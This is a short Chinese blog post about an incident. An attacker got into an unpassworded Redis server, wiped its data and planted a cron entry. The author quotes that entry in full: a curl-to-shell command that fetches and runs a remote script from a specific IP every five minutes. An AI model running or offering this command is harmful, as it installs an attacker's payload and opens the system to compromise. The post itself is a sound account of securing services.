今天本来打算登录博客写篇文章,发现登录的二维码尽然出不来了。 经过排查发现redis库里面的数据被清空了,惊讶的是尽然还多了两个很奇怪配置,如下
n1=*/5 * * * * curl -fsSL 159.89.190.243/dbEx.php | sh
显然是被黑客入侵了,还好没有其他的破坏性产生。这也算是一个警告吧。
之所以能够被黑的原因是redis没有设置密码保护。为了避免此类事件发生,还是老老实实的都检查了每个服务,把所有的服务都重新设置了密码。
这个事故也让我引起了重视,网络安全必须时刻警惕。